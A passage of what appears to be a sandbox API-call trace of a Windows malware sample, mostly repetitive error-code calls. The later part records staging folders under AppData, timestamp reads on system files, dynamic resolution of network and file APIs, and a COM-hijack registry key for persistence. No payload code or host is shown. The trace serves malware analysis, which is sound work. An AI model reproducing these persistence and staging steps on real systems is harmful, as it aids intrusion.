(dwErrCode=0x0) [0034.077] GetLastError () returned 0x0 [0034.077] SetLastError (dwErrCode=0x0) [0034.077] GetLastError () returned 0x0 [0034.077] SetLastError (dwErrCode=0x0) [0034.077] GetLastError () returned 0x0 [0034.077] SetLastError (dwErrCode=0x0) [0034.077] GetLastError () returned 0x0 [0034.077] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.078] SetLastError (dwErrCode=0x0) [0034.078] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.079] SetLastError (dwErrCode=0x0) [0034.079] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.080] GetLastError () returned 0x0 [0034.080] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.081] GetLastError () returned 0x0 [0034.081] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.082] SetLastError (dwErrCode=0x0) [0034.082] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.083] SetLastError (dwErrCode=0x0) [0034.083] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.084] SetLastError (dwErrCode=0x0) [0034.084] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.085] SetLastError (dwErrCode=0x0) [0034.085] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.086] SetLastError (dwErrCode=0x0) [0034.086] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.087] SetLastError (dwErrCode=0x0) [0034.087] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.088] SetLastError (dwErrCode=0x0) [0034.088] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.089] SetLastError (dwErrCode=0x0) [0034.089] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.090] GetLastError () returned 0x0 [0034.090] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.091] SetLastError (dwErrCode=0x0) [0034.091] GetLastError () returned 0x0 [0034.092] SetLastError (dwErrCode=0x0) [0034.092] GetLastError () returned 0x0 [0034.092] SetLastError (dwErrCode=0x0) [0034.092] GetLastError () returned 0x0 [0034.092] SetLastError (dwErrCode=0x0) [0034.093] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.093] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.093] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f610 | out: lpSystemTimeAsFileTime=0x26f610*(dwLowDateTime=0xe201a4d0, dwHighDateTime=0x1d3dfba)) [0034.094] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f548, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.094] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f430, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.094] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetLastError () returned 0x0 [0034.095] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.095] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.095] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.095] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.095] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.095] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.096] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.096] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.096] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.096] GetLastError () returned 0xb7 [0034.096] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.096] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.096] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.096] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.096] wsprintfA (in: param_1=0x26f2b0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.096] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.096] wsprintfA (in: param_1=0x26f1ac, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.096] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.096] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.096] CloseHandle (hObject=0x74) returned 1 [0034.097] GetLastError () returned 0x0 [0034.097] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.097] GetLastError () returned 0x0 [0034.097] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.097] GetSystemDirectoryA (in: lpBuffer=0x26f2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.097] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.097] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.097] CloseHandle (hObject=0x74) returned 1 [0034.097] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.097] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.098] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.099] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.099] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.099] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.100] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.100] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.100] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.100] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.100] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.101] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.102] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.102] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.102] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.102] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.102] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.102] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.103] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.103] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.103] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.103] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.103] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.103] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.103] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.103] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.104] GetVersionExW (in: lpVersionInformation=0x26f834*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26f834*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0034.104] GetLastError () returned 0x7f [0034.104] SetLastError (dwErrCode=0x7f) [0034.104] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x26f528, lpdwDisposition=0x0 | out: phkResult=0x26f528*=0x7c, lpdwDisposition=0x0) returned 0x0 [0034.104] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="DefaultInstall", cbData=0x1e | out: lpData="DefaultInstall") returned 0x0 [0034.104] GetLastError () returned 0x7f [0034.104] GetLastError () returned 0x7f [0034.104] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, 